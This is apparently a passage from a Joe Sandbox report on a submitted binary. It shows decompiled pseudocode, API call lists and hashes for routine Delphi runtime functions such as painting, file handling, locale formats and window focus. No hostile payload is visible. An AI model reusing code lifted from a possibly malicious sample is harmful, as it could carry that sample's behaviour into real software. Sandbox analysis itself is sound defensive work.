                                                    						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                                    							E00419804( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                                    							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                                    								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                                    									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                                    								}
                                                    								_v60.top = SaveDC(_t162);
                                                    								L004398B8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                                    								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                                    								E0043C130(_t136, _t162, 0xf, 0);
                                                    								RestoreDC(_t162, _v80);
                                                    								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                                    							}
                                                    						}
                                                    						_t160 = _t160 + 1;
                                                    					} while (_t160 < _v60.top);
                                                    				}
                                                     			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                    • String ID:
                                                    • API String ID: 375863564-0
                                                    • Opcode ID: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                    • Instruction ID: 085781c14da3806a19508914d9dc02b8af2cdac2da7d1e5622b20ea0d846e8a9
                                                    • Opcode Fuzzy Hash: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                    • Instruction Fuzzy Hash: CC516F71A04200ABD714EF69C8C5B5B77D8AF49308F04546AEE89CB397D738EC45CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                    			E00402D70(void** __eax) {
                                                    				long _t29;
                                                    				void* _t31;
                                                    				long _t34;
                                                    				void* _t38;
                                                    				void* _t40;
                                                    				long _t41;
                                                    				int _t44;
                                                    				void* _t46;
                                                    				long _t54;
                                                    				long _t55;
                                                    				void* _t58;
                                                    				void** _t59;
                                                    				DWORD* _t60;
                                                    
                                                    				_t59 = __eax;
                                                    				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                    				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                    				if(0xffffffffffff284f == 0) {
                                                    					_t29 = 0x80000000;
                                                    					_t55 = 1;
                                                    					_t54 = 3;
                                                    					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
                                                    				} else {
                                                    					if(0xffffffffffff284f == 0) {
                                                    						_t29 = 0x40000000;
                                                    						_t55 = 1;
                                                    						_t54 = 2;
                                                    					} else {
                                                    						if(0xffffffffffff284f != 0) {
                                                    							return 0xffffffffffff284d;
                                                    						}
                                                    						_t29 = 0xc0000000;
                                                    						_t55 = 1;
                                                    						_t54 = 3;
                                                    					}
                                                    					_t59[7] = E00402D04;
                                                    				}
                                                    				_t59[9] = E00402D50;
                                                    				_t59[8] = E00402D00;
                                                    				if(_t59[0x12] == 0) {
                                                    					_t59[2] = 0x80;
                                                    					_t59[9] = E00402D00;
                                                    					_t59[5] =  &(_t59[0x53]);
                                                    					if(_t59[1] == 0xd7b2) {
                                                    						if(_t59 != 0x49e3e8) {
                                                    							_push(0xfffffff5);
                                                    						} else {
                                                    							_push(0xfffffff4);
                                                    						}
                                                    					} else {
                                                    						_push(0xfffffff6);
                                                    					}
                                                    					_t31 = GetStdHandle();
                                                    					if(_t31 == 0xffffffff) {
                                                    						goto L37;
                                                    					}
                                                    					 *_t59 = _t31;
                                                    					goto L30;
                                                    				} else {
                                                    					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                    					if(_t38 == 0xffffffff) {
                                                    						L37:
                                                    						_t59[1] = 0xd7b0;
                                                    						return GetLastError();
                                                    					}
                                                    					 *_t59 = _t38;
                                                    					if(_t59[1] != 0xd7b3) {
                                                    						L30:
                                                    						if(_t59[1] == 0xd7b1) {
                                                    							L34:
                                                    							return 0;
                                                    						}
                                                    						_t34 = GetFileType( *_t59);
                                                    						if(_t34 == 0) {
                                                    							CloseHandle( *_t59);
                                                    							_t59[1] = 0xd7b0;
                                                    							return 0x69;
                                                    						}
                                                    						if(_t34 == 2) {
                                                    							_t59[8] = E00402D04;
                                                    						}
                                                    						goto L34;
                                                    					}
                                                    					_t59[1] = _t59[1] - 1;
                                                    					_t40 = GetFileSize( *_t59, 0) + 1;
                                                    					if(_t40 == 0) {
                                                    						goto L37;
                                                    					}
                                                    					_t41 = _t40 - 0x81;
                                                    					if(_t41 < 0) {
                                                    						_t41 = 0;
                                                    					}
                                                    					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                    						goto L37;
                                                    					} else {
                                                    						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                    						_t58 = 0;
                                                    						if(_t44 != 1) {
                                                    							goto L37;
                                                    						}
                                                    						_t46 = 0;
                                                    						while(_t46 < _t58) {
                                                    							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                    								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                    									goto L37;
                                                    								} else {
                                                    									goto L30;
                                                    								}
                                                    							}
                                                    							_t46 = _t46 + 1;
                                                    						}
                                                    						goto L30;
                                                    					}
                                                    				}
                                                     			}

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                    • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: 7f15e19dec3a7b4c9707014ec2505ad9d397bf6e92e06e4bc8213e66d79b557f
                                                    • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                    • Opcode Fuzzy Hash: 7f15e19dec3a7b4c9707014ec2505ad9d397bf6e92e06e4bc8213e66d79b557f
                                                    • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E004214B8(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                    				char _v5;
                                                    				intOrPtr* _v12;
                                                    				long _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				long _t22;
                                                    				char _t29;
                                                    				void* _t53;
                                                    				intOrPtr _t61;
                                                    				intOrPtr* _t62;
                                                    				intOrPtr _t63;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t67;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    				intOrPtr _t74;
                                                    
                                                    				_t72 = _t73;
                                                    				_t74 = _t73 + 0xffffffec;
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_t53 = __eax;
                                                    				_t22 = GetCurrentThreadId();
                                                    				_t62 =  *0x49de40; // 0x49e034
                                                    				if(_t22 !=  *_t62) {
                                                    					_v24 = GetCurrentThreadId();
                                                    					_v20 = 0;
                                                    					_t61 =  *0x49dbc8; // 0x41744c
                                                    					E0040D23C(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                                                    					E00404378();
                                                    				}
                                                    				if(_t53 <= 0) {
                                                    					E0042146C();
                                                    				} else {
                                                    					E00421478(_t53);
                                                    				}
                                                    				_v16 = 0;
                                                    				_push(0x49e86c);
                                                    				L00406FE0();
                                                    				_push(_t72);
                                                    				_push(0x421646);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				_v16 = InterlockedExchange( &E0049B5C4, _v16);
                                                    				_push(_t72);
                                                    				_push(0x421627);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                                                    					_t29 = 0;
                                                    				} else {
                                                    					_t29 = 1;
                                                    				}
                                                    				_v5 = _t29;
                                                    				if(_v5 == 0) {
                                                    					L14:
                                                    					_pop(_t63);
                                                    					 *[fs:eax] = _t63;
                                                    					_push(E0042162E);
                                                    					return L00403BEC(_v16);
                                                    				} else {
                                                    					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                                                    						_v12 = E0041AC6C(_v16, 0);
                                                    						E0041AB5C(_v16, 0);
                                                    						L004071A0();
                                                    						 *[fs:eax] = _t74;
                                                    						 *[fs:eax] = _t74;
                                                    						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4215f1, _t72, 0x49e86c);
                                                    						_pop(_t66);
                                                    						 *[fs:eax] = _t66;
                                                    						_t67 = 0x4215c2;
                                                    						 *[fs:eax] = _t67;
                                                    						_push(E004215F8);
                                                    						_push(0x49e86c);
                                                    						L00406FE0();
                                                    						return 0;
                                                    					} else {
                                                    						goto L14;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 004214C3
                                                    • GetCurrentThreadId.KERNEL32 ref: 004214D2
                                                      • Part of subcall function 0042146C: ResetEvent.KERNEL32(000001FC,0042150D,?,?,00000000), ref: 00421472
                                                    • RtlEnterCriticalSection.KERNEL32(0049E86C,?,?,00000000), ref: 00421517
                                                    • InterlockedExchange.KERNEL32(0049B5C4,?), ref: 00421533
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 0042158C
                                                    • RtlEnterCriticalSection.KERNEL32(0049E86C,004215F8,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 004215EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                    • String ID: 4I$LtA
                                                    • API String ID: 2189153385-4143330910
                                                    • Opcode ID: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                    • Instruction ID: c7144f3b078a98dbb88dc3215a2fca8a3d1431468ba3915c2d0e15c961d82a4d
                                                    • Opcode Fuzzy Hash: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                    • Instruction Fuzzy Hash: DA31EA30B04204BFD711DF65E852A6D7BF8EB59704F9184B7F401932A1D77D9D40CA29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040D058(void* __edx, void* __edi, void* __fp0) {
                                                    				void _v1024;
                                                    				char _v1088;
                                                    				long _v1092;
                                                    				void* _t12;
                                                    				char* _t14;
                                                    				intOrPtr _t16;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t24;
                                                    				long _t32;
                                                    
                                                    				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                    				_t14 =  *0x49dc84; // 0x49e04c
                                                    				if( *_t14 == 0) {
                                                    					_t16 =  *0x49d864; // 0x407db4
                                                    					_t9 = _t16 + 4; // 0xffd2
                                                    					_t18 =  *0x49e668; // 0x400000
                                                    					LoadStringA(L00405FDC(_t18),  *_t9,  &_v1088, 0x40);
                                                    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                    				}
                                                    				_t24 =  *0x49d8f8; // 0x49e21c
                                                    				E004028C4(E00402FCC(_t24));
                                                    				CharToOemA( &_v1024,  &_v1024);
                                                    				_t32 = L00409F88( &_v1024, __edi);
                                                    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                    				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
                                                    			}

                                                    APIs
                                                      • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                      • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                    • CharToOemA.USER32 ref: 0040D08F
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                    • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                    • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                    • LoadStringA.USER32 ref: 0040D0EF
                                                    • MessageBoxA.USER32 ref: 0040D105
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                    • String ID: LI
                                                    • API String ID: 185507032-1163166679
                                                    • Opcode ID: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                    • Opcode Fuzzy Hash: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
                                                    				char _t62;
                                                    				signed int _t64;
                                                    				signed int _t65;
                                                    				signed char _t107;
                                                    				intOrPtr _t113;
                                                    				intOrPtr _t114;
                                                    				int _t117;
                                                    				intOrPtr* _t118;
                                                    				int _t119;
                                                    				int* _t121;
                                                    
                                                    				 *_t121 = __ecx;
                                                    				_t117 = __edx;
                                                    				_t118 = __eax;
                                                    				if(__edx ==  *_t121) {
                                                    					L29:
                                                    					_t62 =  *0x43ad44; // 0x0
                                                    					 *((char*)(_t118 + 0x98)) = _t62;
                                                    					return _t62;
                                                    				}
                                                    				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                    					_t107 =  *0x43ad3c; // 0x1f
                                                    				} else {
                                                    					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                                    				}
                                                    				if((_t107 & 0x00000001) == 0) {
                                                    					_t119 =  *(_t118 + 0x40);
                                                    				} else {
                                                    					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                    				}
                                                    				if((_t107 & 0x00000002) == 0) {
                                                    					_t121[1] =  *(_t118 + 0x44);
                                                    				} else {
                                                    					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                    				}
                                                    				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                    					_t64 =  *(_t118 + 0x48);
                                                    					_t121[2] = _t64;
                                                    				} else {
                                                    					if((_t107 & 0x00000001) == 0) {
                                                    						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                    						_t121[2] = _t64;
                                                    					} else {
                                                    						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                    						_t121[2] = _t64;
                                                    					}
                                                    				}
                                                    				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                    				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                    					_t121[3] =  *(_t118 + 0x4c);
                                                    				} else {
                                                    					if(_t65 == 0) {
                                                    						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                    					} else {
                                                    						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                    					}
                                                    				}
                                                    				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                                    				_t113 =  *0x43ad44; // 0x0
                                                    				if(_t113 != (_t107 &  *0x43ad40)) {
                                                    					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                    				}
                                                    				_t114 =  *0x43ad44; // 0x0
                                                    				if(_t114 != (_t107 &  *0x43ad48)) {
                                                    					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                    				}
                                                    				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                    					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                    				}
                                                    				goto L29;
                                                    			}

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                    • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                    • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				char _v40;
                                                    				char _v44;
                                                    				char _v48;
                                                    				char _v52;
                                                    				char _v56;
                                                    				char _v60;
                                                    				char _v64;
                                                    				char _v68;
                                                    				void* _t104;
                                                    				void* _t111;
                                                    				void* _t133;
                                                    				intOrPtr _t183;
                                                    				intOrPtr _t193;
                                                    				intOrPtr _t194;
                                                    
                                                    				_t191 = __esi;
                                                    				_t190 = __edi;
                                                    				_t193 = _t194;
                                                    				_t133 = 8;
                                                    				do {
                                                    					_push(0);
                                                    					_push(0);
                                                    					_t133 = _t133 - 1;
                                                    				} while (_t133 != 0);
                                                    				_push(__ebx);
                                                    				_push(_t193);
                                                    				_push(0x40e5b3);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t194;
                                                    				E0040E174();
                                                    				E0040CA14(__ebx, __edi, __esi);
                                                    				_t196 =  *0x49e750;
                                                    				if( *0x49e750 != 0) {
                                                    					E0040CBEC(__esi, _t196);
                                                    				}
                                                    				_t132 = GetThreadLocale();
                                                    				E0040C964(_t43, 0, 0x14,  &_v20);
                                                    				E00404A14(0x49e684, _v20);
                                                    				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
                                                    				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
                                                    				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
                                                    				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
                                                    				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
                                                    				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
                                                    				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
                                                    				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
                                                    				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
                                                    				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
                                                    				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                    				E00404A14(0x49e690, _v36);
                                                    				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                    				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                    				E00404A14(0x49e694, _v44);
                                                    				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
                                                    				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
                                                    				E00404A14(0x49e69c, _v52);
                                                    				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
                                                    				E00404A14(0x49e6a0, _v56);
                                                    				E004049C0( &_v12);
                                                    				E004049C0( &_v16);
                                                    				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
                                                    				_t104 = E00409664(0x40e5c8, 0, _t196);
                                                    				_t197 = _t104;
                                                    				if(_t104 != 0) {
                                                    					E00404A58( &_v8, 0x40e620);
                                                    				} else {
                                                    					E00404A58( &_v8, 0x40e614);
                                                    				}
                                                    				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
                                                    				_t111 = E00409664(0x40e5c8, 0, _t197);
                                                    				_t198 = _t111;
                                                    				if(_t111 == 0) {
                                                    					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
                                                    					if(E00409664(0x40e5c8, 0, _t198) != 0) {
                                                    						E00404A58( &_v12, 0x40e63c);
                                                    					} else {
                                                    						E00404A58( &_v16, 0x40e62c);
                                                    					}
                                                    				}
                                                    				_push(_v12);
                                                    				_push(_v8);
                                                    				_push(":mm");
                                                    				_push(_v16);
                                                    				E00404D40();
                                                    				_push(_v12);
                                                    				_push(_v8);
                                                    				_push(":mm:ss");
                                                    				_push(_v16);
                                                    				E00404D40();
                                                    				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
                                                    				_pop(_t183);
                                                    				 *[fs:eax] = _t183;
                                                    				_push(E0040E5BA);
                                                    				return E004049E4( &_v68, 0x10);
                                                    			}
                                                    Instruction addresses (per statement of the C-Code above):
                                                    0x0040e2e8 0x0040e2e8 0x0040e2e9 0x0040e2eb 0x0040e2f0 0x0040e2f0 0x0040e2f2 0x0040e2f4 0x0040e2f4 0x0040e2f7
                                                    0x0040e2fa 0x0040e2fb 0x0040e300 0x0040e303 0x0040e306 0x0040e30b 0x0040e310 0x0040e317 0x0040e319 0x0040e319
                                                    0x0040e323 0x0040e332 0x0040e33f 0x0040e354 0x0040e363 0x0040e378 0x0040e387 0x0040e39a 0x0040e3ad 0x0040e3c2
                                                    0x0040e3d1 0x0040e3e4 0x0040e3f9 0x0040e404 0x0040e411 0x0040e426 0x0040e431 0x0040e43e 0x0040e451 0x0040e466
                                                    0x0040e473 0x0040e488 0x0040e495 0x0040e49d 0x0040e4a5 0x0040e4ba 0x0040e4c4 0x0040e4c9 0x0040e4cb 0x0040e4e4
                                                    0x0040e4cd 0x0040e4d5 0x0040e4d5 0x0040e4f9 0x0040e503 0x0040e508 0x0040e50a 0x0040e51c 0x0040e52d 0x0040e546
                                                    0x0040e52f 0x0040e537 0x0040e537 0x0040e52d 0x0040e54b 0x0040e54e 0x0040e551 0x0040e556 0x0040e563 0x0040e568
                                                    0x0040e56b 0x0040e56e 0x0040e573 0x0040e580 0x0040e593 0x0040e59a 0x0040e59d 0x0040e5a0 0x0040e5b2

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                    • API String ID: 4232894706-2493093252
                                                    • Opcode ID: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                    • Opcode Fuzzy Hash: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 96%
                                                    			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                                    				char _v5;
                                                    				char _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				struct HWND__* _v24;
                                                    				intOrPtr _v28;
                                                    				void* _v32;
                                                    				struct tagRECT _v48;
                                                    				struct tagRECT _v64;
                                                    				struct HWND__* _t53;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t65;
                                                    				intOrPtr _t79;
                                                    				intOrPtr _t85;
                                                    				intOrPtr _t87;
                                                    				intOrPtr _t94;
                                                    				intOrPtr _t99;
                                                    				intOrPtr _t102;
                                                    				void* _t103;
                                                    				intOrPtr* _t105;
                                                    				intOrPtr _t107;
                                                    				intOrPtr _t111;
                                                    				intOrPtr _t113;
                                                    				struct HWND__* _t114;
                                                    				intOrPtr _t115;
                                                    				intOrPtr _t117;
                                                    				intOrPtr _t118;
                                                    
                                                    				_t103 = __ecx;
                                                    				_t102 = __eax;
                                                    				_v5 = 1;
                                                    				_t114 = E00438D40(_a4 + 0xfffffff7);
                                                    				_v24 = _t114;
                                                    				_t53 = GetWindow(_t114, 4);
                                                    				_t105 =  *0x49dbcc; // 0x49ebb8
                                                    				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
                                                    					L6:
                                                    					if(_v24 == 0) {
                                                    						L25:
                                                    						return _v5;
                                                    					}
                                                    					_t115 = _t102;
                                                    					while(1) {
                                                    						_t55 =  *((intOrPtr*)(_t115 + 0x30));
                                                    						if(_t55 == 0) {
                                                    							break;
                                                    						}
                                                    						_t115 = _t55;
                                                    					}
                                                    					_t113 = E00441704(_t115);
                                                    					_v28 = _t113;
                                                    					if(_t113 == _v24) {
                                                    						goto L25;
                                                    					}
                                                    					_t13 = _a4 - 0x10; // 0xe87d83e8
                                                    					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                                    					if(_t60 == 0) {
                                                    						_t19 = _a4 - 0x10; // 0xe87d83e8
                                                    						_t107 =  *0x437498; // 0x4374e4
                                                    						__eflags = L00403D78( *_t19, _t107);
                                                    						if(__eflags == 0) {
                                                    							__eflags = 0;
                                                    							_v32 = 0;
